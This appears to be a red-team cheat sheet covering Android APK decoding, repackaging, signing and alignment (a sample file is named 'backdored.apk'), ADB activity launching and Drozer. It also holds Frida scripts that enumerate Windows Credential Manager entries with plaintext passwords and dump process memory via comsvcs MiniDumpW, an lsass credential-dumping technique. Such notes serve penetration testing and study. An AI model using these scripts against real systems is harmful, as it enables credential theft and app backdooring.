Red Teaming and Malware Analysis

Mobile
Basic tips

Getting certificate details from an apk

keytool -printcert -jarfile file.apk

apktool - decode and compile APK

java -jar .\apktool.jar decode -r 'C:\tmp\xxxxx.apk'

(-r / --no-res leaves res/ and resources.arsc untouched; only the dex files are turned into smali, which is enough when you just want to patch code. Run the build from inside the decoded folder, with apktool.jar one level up. The rebuilt APK is unsigned and cannot be installed until it is signed, see below.)
java -jar ..\apktool.jar build -o c:\tmp\new.apk C:\Tools\android\apk_folder

I: Using Apktool 2.5.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Copying raw resources...
I: Copying libs... (/lib)
I: Copying libs... (/kotlin)
I: Copying libs... (/META-INF/services)
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...
PS C:\Tools\android\>

Create keystore key

 cd "C:\Program Files\Java\jre1.8.0_251\bin"
 keytool.exe -genkey -v -keystore c:\tmp\.keystore -keyalg RSA -keysize 2040 -validity 365 -alias baws
 
 (...)
 Generating 2,040 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 365 days
        for: CN=123, OU=123, O=123, L=123, ST=123, C=123
[Storing c:\tmp\.keystore]

keytool prompts for the distinguished name and for the keystore/key passwords; the alias (baws) is what jarsigner refers to afterwards. A 2040-bit key works, but 2048 is the conventional RSA size.

Sign apk with jarsigner

Here, you need to use the alias created together with the keystore file (baws, in this case). jarsigner only produces a v1 (JAR) signature: fine for a test device, but Android 11+ refuses APKs that target API 30 or higher unless they also carry a v2 or newer signature (apksigner adds those). Recent JDKs also warn that SHA-1 is weak; the SHA1 options below only matter for very old Android versions.

cd "C:\Program Files\AdoptOpenJDK\jdk-11.0.11.9-hotspot\bin"
jarsigner.exe -sigalg SHA1withRSA -digestalg SHA1 c:\tmp\new.apk baws -keystore C:\tmp\.keystore

(...)
Enter Passphrase for keystore:
jar signed.

Warning:
The signer's certificate is self-signed.

Align APK to avoid errors

After signing an APK, if the install fails with an error such as "Failed to extract native libraries, res=-2", the APK probably needs to be aligned. This particular error is about the uncompressed .so files: the -p flag of zipalign page-aligns them so the loader can map them straight out of the APK.

.\adb.exe install C:\tmp\backdored.apk
Performing Streamed Install
adb: failed to install C:\tmp\backdored.apk: Failure [INSTALL_FAILED_INVALID_APK: Failed to extract native libraries, res=-2]

Attention: zipalign must run at one of two specific points in the build, depending on the signing tool you use:

  • If you use apksigner, run zipalign before signing the APK. Any change to the APK after apksigner has signed it (zipalign included) invalidates the v2/v3 signature, which covers the whole zip layout.

  • If you use jarsigner, run zipalign after signing the APK. A v1 signature only covers the entry contents, so re-laying out the zip does not break it.

As jarsigner was used here, the last step is aligning the APK and then installing the aligned file, not the original (zipalign -c 4 verifies the result):

zipalign -p -f -v 4 backdored.apk backdored-aligned.apk

--now--
.\adb.exe install C:\tmp\backdored-aligned.apk
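To check the outcome of the sign and align steps without a device, here is an added example (not from the original page): a small Python checker that reports which signature scheme an APK carries and which uncompressed entries zipalign would still complain about. It assumes the jarsigner workflow above (v1 signature files under META-INF/, no APK Signing Block) and builds its sample APK in memory with placeholder contents; the insert_signing_block helper only demonstrates where apksigner's block sits and does not produce a valid signature.

```python
"""Offline APK checks for the jarsigner + zipalign workflow (added example).

  * signature_schemes(): jarsigner writes only a v1 (JAR) signature under
    META-INF/; apksigner adds an "APK Signing Block" (v2/v3) immediately
    before the zip central directory.
  * misaligned_entries(): the check `zipalign -c` performs. STORED entries must
    start on a 4-byte boundary and, with -p, .so files on a 4096-byte page.
Standard library only; the sample APK is constructed, not a real app.
"""
import io
import struct
import zipfile

APK_SIG_BLOCK_MAGIC = b"APK Sig Block 42"
V2_BLOCK_ID = 0x7109871A        # ID of the v2 signature ID-value pair
LOCAL_HEADER_LEN = 30           # fixed part of a zip local file header


def central_directory_offset(data: bytes) -> int:
    """Find the End Of Central Directory record and return the CD offset."""
    eocd = data.rfind(b"PK\x05\x06")        # APKs carry no archive comment
    if eocd < 0:
        raise ValueError("not a zip file: EOCD record missing")
    return struct.unpack_from("<I", data, eocd + 16)[0]


def signature_schemes(data: bytes) -> dict:
    """Report v1 (META-INF/*.SF + *.RSA|DSA|EC) and v2+ (signing block)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        meta = [n.upper() for n in zf.namelist() if n.startswith("META-INF/")]
    v1 = any(n.endswith(".SF") for n in meta) and any(
        n.endswith((".RSA", ".DSA", ".EC")) for n in meta)

    cd = central_directory_offset(data)
    v2 = False
    if cd >= 24 and data[cd - 16:cd] == APK_SIG_BLOCK_MAGIC:
        size = struct.unpack_from("<Q", data, cd - 24)[0]  # trailing "size of block"
        start = cd - size - 8                               # block opens with the same field
        v2 = start >= 0 and struct.unpack_from("<Q", data, start)[0] == size
    return {"v1": v1, "v2_or_later": v2}


def misaligned_entries(data: bytes, page_align_so: bool = True) -> list:
    """(name, data_offset, required_alignment) for every STORED entry whose
    data does not start where zipalign would put it."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.compress_type != zipfile.ZIP_STORED:
                continue                    # zipalign leaves compressed entries alone
            hdr = info.header_offset
            name_len, extra_len = struct.unpack_from("<HH", data, hdr + 26)
            data_off = hdr + LOCAL_HEADER_LEN + name_len + extra_len
            need = 4096 if page_align_so and info.filename.endswith(".so") else 4
            if data_off % need:
                bad.append((info.filename, data_off, need))
    return bad


def insert_signing_block(data: bytes, pairs: bytes) -> bytes:
    """Splice an APK Signing Block (given ID-value pairs) before the central
    directory and patch the EOCD offset. Layout demo only: no real signature."""
    cd = central_directory_offset(data)
    size = len(pairs) + 8 + 16            # pairs + trailing size field + magic
    block = struct.pack("<Q", size) + pairs + struct.pack("<Q", size) + APK_SIG_BLOCK_MAGIC
    eocd = data.rfind(b"PK\x05\x06")
    out = bytearray(data[:cd] + block + data[cd:])
    struct.pack_into("<I", out, eocd + len(block) + 16, cd + len(block))
    return bytes(out)


def build_sample_apk() -> bytes:
    """Constructed stand-in for a jarsigner-signed, unaligned APK: everything
    STORED, v1 signature files present, no signing block, placeholder bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>\n")
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 24)
        zf.writestr("lib/arm64-v8a/libnative.so", b"\x7fELF" + b"\x00" * 60)
        zf.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\r\n")
        zf.writestr("META-INF/CERT.SF", b"Signature-Version: 1.0\r\n")
        zf.writestr("META-INF/CERT.RSA", b"\x30\x82" + b"\x00" * 30)
    return buf.getvalue()


if __name__ == "__main__":
    apk = build_sample_apk()
    print(signature_schemes(apk))
    for name, off, need in misaligned_entries(apk):
        print(f"{name}: data at {off}, needs {need}-byte alignment")
```

Point it at a real file with `signature_schemes(open("backdored-aligned.apk", "rb").read())`: a jarsigner-only APK reports v1 but not v2_or_later, which is exactly why it is rejected by devices enforcing v2 for API 30+ targets.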

Execute target activity via ADB

First, get the package name from AndroidManifest.xml: it is the package attribute on the first line of the decoded file (<?xml version="1.0" encoding="utf-8" standalone="no" ... package="com.x.x.x.x" ...). Next, pick a target activity, which is the android:name="..." value of its <activity> element (here the DashboardActivity), and start it as package/activity. Only exported activities can be started this way from the adb shell user; a non-exported one fails with "Permission Denial: ... not exported from uid" unless it is made exported (or given an intent-filter) in the manifest before rebuilding, or started from a root shell.

 .\adb.exe shell am start com.xxx.xxx.xxx/com.xxx.xxx.v2.ui.dashboard.DashboardActivity
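As an added example (not part of the original page), the following Python reads a decoded AndroidManifest.xml and lists the activities that can be started from the adb shell, together with the am start command for each. The sample manifest and the package and activity names in it are constructed for the example. The export rule it applies (android:exported="true", or an intent-filter with no explicit attribute) is the pre-Android 12 rule; Android 12+ requires the attribute to be explicit on components with intent-filters.

```python
"""List activities reachable with `adb shell am start` from a decoded manifest
(added example). Rules: exported when android:exported="true", or when the
attribute is absent and an <intent-filter> exists. android:name values that
start with "." or contain no "." are relative to the manifest's package."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS           # ElementTree notation for the android: prefix

# Constructed sample, as apktool would leave it after decoding.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.target">
    <application android:label="Target">
        <activity android:name=".ui.login.LoginActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.example.target.v2.ui.dashboard.DashboardActivity"/>
        <activity android:name=".debug.DebugActivity" android:exported="true"/>
        <activity android:name=".ui.SettingsActivity" android:exported="false">
            <intent-filter><action android:name="com.example.target.OPEN"/></intent-filter>
        </activity>
    </application>
</manifest>
"""


def qualify(package: str, name: str) -> str:
    """Expand a shorthand android:name into a fully qualified class name."""
    if name.startswith("."):
        return package + name
    if "." not in name:
        return package + "." + name
    return name


def activities(manifest_xml: str):
    """Return (package, [{name, exported, implicit, launcher}, ...])."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    app = root.find("application")
    out = []
    for tag in ("activity", "activity-alias"):
        for act in app.findall(tag):
            exported_attr = act.get(A + "exported")
            has_filter = act.find("intent-filter") is not None
            exported = exported_attr == "true" or (exported_attr is None and has_filter)
            launcher = any(c.get(A + "name") == "android.intent.category.LAUNCHER"
                           for c in act.iter("category"))
            out.append({
                "name": qualify(package, act.get(A + "name")),
                "exported": exported,
                # implicit export: worth flagging, Android 12+ rejects it at install time
                "implicit": exported_attr is None and has_filter,
                "launcher": launcher,
            })
    return package, out


def am_start_commands(manifest_xml: str) -> list:
    """One `adb shell am start -n` line per activity the shell user may start."""
    package, acts = activities(manifest_xml)
    return [f"adb shell am start -n {package}/{a['name']}" for a in acts if a["exported"]]


if __name__ == "__main__":
    pkg, acts = activities(SAMPLE_MANIFEST)
    for a in acts:
        print(f"{a['name']:60} exported={a['exported']} launcher={a['launcher']}")
    print("\n".join(am_start_commands(SAMPLE_MANIFEST)))
```

Run it against `AndroidManifest.xml` from the apktool output directory; the DashboardActivity-style entry without an intent-filter shows up as not exported, which is the case where you either patch the manifest before rebuilding or start the activity from a root shell.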

Add GSM

These properties describe the SIM and network operator the app sees (MCC+MNC numeric code, operator name and ISO country). Setting them needs a root shell, which in practice means the emulator or a rooted device, and they reset on reboot.

adb shell
setprop gsm.operator.numeric 64304
setprop gsm.sim.operator.numeric 64304
setprop gsm.sim.operator.alpha target
setprop gsm.operator.alpha target
setprop gsm.sim.operator.iso-country us
setprop gsm.operator.iso-country us

--validate--
getprop | grep gsm

Frida: enumerate user credentials (Windows)

// First attempt: CredEnumerateW with a NULL filter. Note the indexing on the marked
// line: pCredentials is a PCREDENTIALW** out-parameter, so it has to be dereferenced
// once more before indexing; as written, i=0 yields the base of the returned buffer
// (the pointer array followed by the structs), which is what the hex dump below
// shows. The 2nd example has the corrected indexing.
function EnumerateGenericCredentials(credname){
    const CredEnumerate_ptr = Module.getExportByName("advapi32", "CredEnumerateW");
    // BOOL CredEnumerateW(LPCWSTR Filter, DWORD Flags, DWORD *Count, PCREDENTIALW **Credential)
    const CredEnumerate = new NativeFunction(CredEnumerate_ptr, "pointer", ["pointer", "int", "pointer", "pointer"])
    const count = Memory.alloc(8);
    const pCredentials = Memory.alloc(8);
    // Filter is a TargetName prefix followed by "*" (e.g. "teste*"), or NULL for every entry
    const filter = credname ? Memory.allocUtf16String(credname) : NULL;
    const ret = CredEnumerate(filter, 0, count, pCredentials);
    // ret is a NativePointer and therefore always truthy: test the value, not the object
    if(!ret.isNull()){
        console.log("Enumerate complete! Found " + count.readInt() + " entries.");

        for(var i=0; i<count.readInt(); i++){
            const curr = pCredentials.add(i*8).readPointer(); // indexing bug, see comment above
            console.log(curr.readByteArray(256));
        }

    }
}


[Remote::c:\windows\system32\cmd.exe]-> EnumerateGenericCredentials()
Enumerate complete! Found 1 entries.
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  18 41 e0 1c 37 02 00 00 00 00 00 00 02 00 00 00  .A..7...........
00000010  70 41 e0 1c 37 02 00 00 00 00 00 00 00 00 00 00  pA..7...........
00000020  a8 78 32 15 34 6c d7 01 00 00 00 00 00 00 00 00  .x2.4l..........
00000030  00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00  ................
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000050  7e 41 e0 1c 37 02 00 00 00 00 00 00 00 00 00 00  ~A..7...........
00000060  74 00 65 00 73 00 74 00 65 00 31 00 00 00 75 00  t.e.s.t.e.1...u.
00000070  73 00 65 00 72 00 31 00 00 00 00 00 00 00 00 00  s.e.r.1.........
00000080  00 00 00 00 00 00 00 00 1e 88 b1 e6 00 12 00 80  ................
00000090  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000b0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000c0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000d0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000e0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000f0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

Reading the dump: the first quadword is the PCREDENTIALW of entry 0 (0x2371ce04118, i.e. 8 bytes into this buffer). The CREDENTIALW therefore starts at +0x08: Flags=0, Type=2 (CRED_TYPE_DOMAIN_PASSWORD), TargetName pointer 0x2371ce04170 (the "teste1" at +0x60), Comment NULL, LastWritten FILETIME at +0x20, CredentialBlobSize=0 (no stored secret, hence the "null" password in the next example), Persist=3 (CRED_PERSIST_ENTERPRISE) at +0x38, and UserName pointer 0x2371ce0417e (the "user1" at +0x6e).

---2nd example---
[Remote::c:\windows\system32\cmd.exe]-> EnumerateGenericCredentials()
Enumerate complete! Found 2 entries. pCredentials=0x1f3e83c2470
Credentials at 0x1f3e6184310 ret: 0x1
teste1:user1:null
Credentials at 0x1f3e6184378 ret: 0x1
teste2:user2:pass2
---------------------------------------------
// Corrected version: dereference the out-parameter before indexing the PCREDENTIALA
// array, then read the fields of each CREDENTIALA. The offsets are for a 64-bit
// process (TargetName 8, CredentialBlobSize 32, CredentialBlob 40, UserName 72);
// in a 32-bit process they are 8, 24, 28 and 48.
function EnumerateGenericCredentials(credname){
    const CredEnumerate_ptr = Module.getExportByName("advapi32", "CredEnumerateA");
    const CredEnumerate = new NativeFunction(CredEnumerate_ptr, "pointer", ["pointer", "int", "pointer", "pointer"])
    const CredFree = new NativeFunction(Module.getExportByName("advapi32", "CredFree"), "void", ["pointer"]);
    const count = Memory.alloc(Process.pointerSize);
    const pCredentials = Memory.alloc(Process.pointerSize);      // receives PCREDENTIALA*
    const filter = credname ? Memory.allocAnsiString(credname) : NULL; // e.g. "teste*", NULL = all
    const ret = CredEnumerate(filter, 0, count, pCredentials);
    if(!ret.isNull()){   // a NativePointer is always truthy, so test the value explicitly
        console.log("Enumerate complete! Found " + count.readInt() + " entries. pCredentials="+pCredentials);
        const creds = pCredentials.readPointer();                 // PCREDENTIALA[]

        for(var i=0; i<count.readInt(); i++){
            const curr = creds.add(i * Process.pointerSize).readPointer();
            
            console.log("Credentials at " + curr + " ret: " + ret);
                const targetname = curr.add(8).readPointer().readAnsiString();
                const size = curr.add(32).readU32();               // CredentialBlobSize, in bytes
                const blob = curr.add(40).readPointer();           // CredentialBlob, not NUL-terminated
                const username = curr.add(72).readPointer().readAnsiString();
                // cmdkey/CredWrite store the secret as UTF-16LE; bound the read by the blob size
                const password = size > 0 ? blob.readUtf16String(size / 2) : null;
            console.log(targetname + ":" + username + ":" + password);
        }
        CredFree(creds);   // the array and the structs are one allocation, freed once
    }else{
        console.log("ret is false!");
    }
}

--3rd example---
[Remote::c:\windows\system32\cmd.exe]-> GetGenericCredentials("teste2")
CredReadA is 0x7ffdd7e44e90
Credentials at 0x1f3e83c23e0 ret: 0x1
user2:pass2
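Added example, not code from the original page, covering both the enumeration above and the CredReadA lookup of the third example (whose function body the page does not show): the CREDENTIALA layout is derived for 32- and 64-bit processes instead of hard-coding the x64 offsets, the blob read is bounded by CredentialBlobSize, every buffer is released with CredFree, and CredEnumerateA goes through SystemFunction so GetLastError is available (ERROR_NOT_FOUND when nothing matches). The module, export and constant names are from wincred.h; "teste2" in the usage comment is the page's own test entry. Only the two wrapper functions need Frida; the layout and the record reader are plain JavaScript.

```javascript
// CREDENTIALA handling for Frida on Windows (added example, not from the page).
const CRED_TYPE_GENERIC = 1;
const ERROR_NOT_FOUND = 1168;   // CredEnumerate/CredRead: no matching credential

// Field offsets of CREDENTIALA (wincred.h) for a pointer size of 4 or 8, built
// from natural alignment: DWORD Flags, DWORD Type, LPSTR TargetName, LPSTR Comment,
// FILETIME LastWritten, DWORD CredentialBlobSize, LPBYTE CredentialBlob,
// DWORD Persist, DWORD AttributeCount, PCREDENTIAL_ATTRIBUTEA Attributes,
// LPSTR TargetAlias, LPSTR UserName.
function credentialLayout(ptrSize) {
  const align = (off, n) => (off + n - 1) & ~(n - 1);
  const L = {};
  let off = 0;
  L.Flags = off;              off += 4;
  L.Type = off;               off += 4;
  off = align(off, ptrSize);
  L.TargetName = off;         off += ptrSize;
  L.Comment = off;            off += ptrSize;
  L.LastWritten = off;        off += 8;      // FILETIME: two DWORDs
  L.CredentialBlobSize = off; off += 4;
  off = align(off, ptrSize);
  L.CredentialBlob = off;     off += ptrSize;
  L.Persist = off;            off += 4;
  L.AttributeCount = off;     off += 4;
  off = align(off, ptrSize);
  L.Attributes = off;         off += ptrSize;
  L.TargetAlias = off;        off += ptrSize;
  L.UserName = off;           off += ptrSize;
  L.size = align(off, ptrSize);
  return L;
}

// Decode one CREDENTIALA record. `p` is a NativePointer, or anything exposing the
// same add/isNull/readU32/readPointer/readAnsiString/readUtf16String methods.
function readCredential(p, L) {
  const targetPtr = p.add(L.TargetName).readPointer();
  const userPtr = p.add(L.UserName).readPointer();
  const blobSize = p.add(L.CredentialBlobSize).readU32();
  const blob = p.add(L.CredentialBlob).readPointer();
  return {
    type: p.add(L.Type).readU32(),
    persist: p.add(L.Persist).readU32(),
    target: targetPtr.isNull() ? null : targetPtr.readAnsiString(),
    user: userPtr.isNull() ? null : userPtr.readAnsiString(),
    // The blob is not NUL-terminated, so bound the read by its size. cmdkey and
    // CredWrite callers store UTF-16LE passwords; other callers may store raw bytes.
    secret: blobSize > 0 && !blob.isNull() ? blob.readUtf16String(blobSize / 2) : null,
  };
}

// Module.getExportByName(module, name) is the Frida <= 16 API the page uses;
// on Frida 17+ use Process.getModuleByName("advapi32.dll").getExportByName(name).
function advapi(name, ret, args) {
  return new NativeFunction(Module.getExportByName("advapi32.dll", name), ret, args);
}

// CredEnumerateA(Filter, Flags, &Count, &Credentials). Filter is a TargetName
// prefix followed by "*" (e.g. "teste*"), or null for everything.
function enumerateCredentials(filter) {
  const CredEnumerateA = new SystemFunction(
    Module.getExportByName("advapi32.dll", "CredEnumerateA"),
    "bool", ["pointer", "uint32", "pointer", "pointer"]);
  const CredFree = advapi("CredFree", "void", ["pointer"]);
  const L = credentialLayout(Process.pointerSize);
  const count = Memory.alloc(4);
  const ppCreds = Memory.alloc(Process.pointerSize);
  const r = CredEnumerateA(filter ? Memory.allocAnsiString(filter) : NULL, 0, count, ppCreds);
  if (!r.value) {
    if (r.lastError !== ERROR_NOT_FOUND) console.log("CredEnumerateA failed, GetLastError=" + r.lastError);
    return [];
  }
  const creds = ppCreds.readPointer();          // PCREDENTIALA[]: one allocation, freed once
  const out = [];
  for (let i = 0; i < count.readU32(); i++) {
    out.push(readCredential(creds.add(i * Process.pointerSize).readPointer(), L));
  }
  CredFree(creds);
  return out;
}

// CredReadA(TargetName, Type, Flags, &Credential): the lookup of the third example.
function readCredentialByName(target, type = CRED_TYPE_GENERIC) {
  const CredReadA = advapi("CredReadA", "bool", ["pointer", "uint32", "uint32", "pointer"]);
  const CredFree = advapi("CredFree", "void", ["pointer"]);
  const pCred = Memory.alloc(Process.pointerSize);
  if (!CredReadA(Memory.allocAnsiString(target), type, 0, pCred)) return null;
  const cred = readCredential(pCred.readPointer(), credentialLayout(Process.pointerSize));
  CredFree(pCred.readPointer());
  return cred;
}

// From the Frida REPL inside any process on the target:
//   enumerateCredentials(null).forEach(c => console.log(c.target + ":" + c.user + ":" + c.secret));
//   readCredentialByName("teste2");
```

Credentials are stored per logon session, so the process you attach to decides what CredEnumerate returns; a 32-bit target needs no change because the layout is recomputed from Process.pointerSize.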

Frida minidump - Windows

// Load comsvcs.dll into the current process and call its exported MiniDumpW, the
// same routine behind the well-known "rundll32 comsvcs.dll, MiniDump <pid> <path> full"
// one-liner (and just as widely signatured). Dumping a protected process such as
// lsass.exe needs SeDebugPrivilege, i.e. an elevated context.
function MiniDump(pid, dumpname){
    const LoadLibraryW_ptr = Module.getExportByName("kernel32", "LoadLibraryW");
    const LoadLibraryW = new NativeFunction(LoadLibraryW_ptr, "pointer", ["pointer"]);  // returns HMODULE
    const hMod = LoadLibraryW(Memory.allocUtf16String("comsvcs.dll"));
    if (hMod.isNull()) { console.log("LoadLibraryW(comsvcs.dll) failed"); return; }

    const MiniDumpW_ptr = Module.getExportByName("comsvcs", "MiniDumpW");
    const MiniDumpW = new NativeFunction(MiniDumpW_ptr, "int", ["uint32", "uint32", "pointer"]);
    
    // MiniDumpW parses a single wide string: "<pid> <absolute dump path> full"
    const cmd = pid + " " + dumpname + " full";
    console.log("Running MiniDump(" + cmd + ")");
    MiniDumpW(0, 0, Memory.allocUtf16String(cmd));
}

[Remote::c:\windows\system32\cmd.exe]-> MiniDump(108, "c:\\Users\\user\\Desktop\\dump.asd")

Drozer: Android App enumeration

adb install drozer-agent-2.x.x.apk
drozer console connect --server 192.168.0.10

--server points at the agent over the network; with a USB-attached device, forward the agent's TCP port 31415 with adb forward first and connect without --server.

Basic commands below:

Last updated 3 years ago
